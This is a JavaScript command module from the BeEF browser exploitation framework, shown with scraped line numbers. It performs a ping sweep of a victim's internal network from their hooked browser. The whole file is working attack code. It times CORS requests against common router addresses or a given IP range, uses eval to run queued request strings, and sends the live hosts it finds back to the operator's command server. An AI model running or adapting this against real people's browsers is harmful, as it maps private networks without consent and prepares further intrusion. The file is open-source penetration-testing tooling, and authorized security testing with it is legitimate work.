1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
  var ips = new Array();
10
  var rhosts = "<%= @rhosts %>";
11
  var threads = parseInt("<%= @threads %>", 10) || 3;
12
  var timeout = 1000;
13

14
  if(!beef.browser.hasCors()) {
15
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.are.status_error());
16
    return;
17
  }
18

19
  // set target IP addresses
20
  if (rhosts == 'common') {
21
    // use default IPs
22
    ips = [
23
      '192.168.0.1',
24
      '192.168.0.100',
25
      '192.168.0.254',
26
      '192.168.1.1',
27
      '192.168.1.100',
28
      '192.168.1.254',
29
      '10.0.0.1',
30
      '10.1.1.1',
31
      '192.168.2.1',
32
      '192.168.2.254',
33
      '192.168.100.1',
34
      '192.168.100.254',
35
      '192.168.123.1',
36
      '192.168.123.254',
37
      '192.168.10.1',
38
      '192.168.10.254'
39
    ];
40
  } else {
41
    // set target IP range
42
    var range = rhosts.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
43
    if (range == null || range[1] == null) {
44
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error());
45
      return;
46
    }
47
    ipBounds   = rhosts.split('-');
48
    lowerBound = ipBounds[0].split('.')[3];
49
    upperBound = ipBounds[1].split('.')[3];
50
    for (var i = lowerBound; i <= upperBound; i++){
51
      ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
52
      ips.push(ipToTest);
53
    }
54
  }
55

56
  WorkerQueue = function(frequency) {
57

58
    var stack = [];
59
    var timer = null;
60
    var frequency = frequency;
61
    var start_scan = (new Date).getTime();
62

63
    this.process = function() {
64
      var item = stack.shift();
65
      eval(item);
66
      if (stack.length === 0) {
67
        clearInterval(timer);
68
        timer = null;
69
        var interval = (new Date).getTime() - start_scan;
70
        beef.debug("[Ping Sweep] Worker queue is complete ["+interval+" ms]");
71
        return;
72
      }
73
    }
74

75
    this.queue = function(item) {
76
      stack.push(item);
77
      if (timer === null) timer = setInterval(this.process, frequency);
78
    }
79

80
  }
81

82
  // create workers
83
  var workers = new Array();
84
  for (w=0; w < threads; w++) workers.push(new WorkerQueue(timeout));
85

86
  beef.debug("[Ping Sweep] Starting scan ("+(ips.length)+" URLs / "+threads+" workers)");
87
  for (var i=0; i < ips.length; i++) {
88
    var worker = workers[i % threads];
89
    var ip = ips[i];
90
    // use a high port likely to be closed/filtered (60000 - 65000)
91
    var port = Math.floor(Math.random() * 5000) + 60000;
92
    worker.queue('var start_time = new Date().getTime();' +
93
      'beef.net.cors.request(' +
94
        '"GET", "http://'+ip+':'+port+'/", "", '+timeout+', function(response) {' +
95
          'var current_time = new Date().getTime();' +
96
          'var duration = current_time - start_time;' +
97
          'if (duration < '+timeout+') {' +
98
            'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- host is up");' +
99
            'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ip+'&ping="+duration+"ms", beef.are.status_success());' +
100
          '} else {' +
101
            'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- timeout");' +
102
          '}' +
103
      '});'
104
    );
105
    }
106

107
});
108

109

110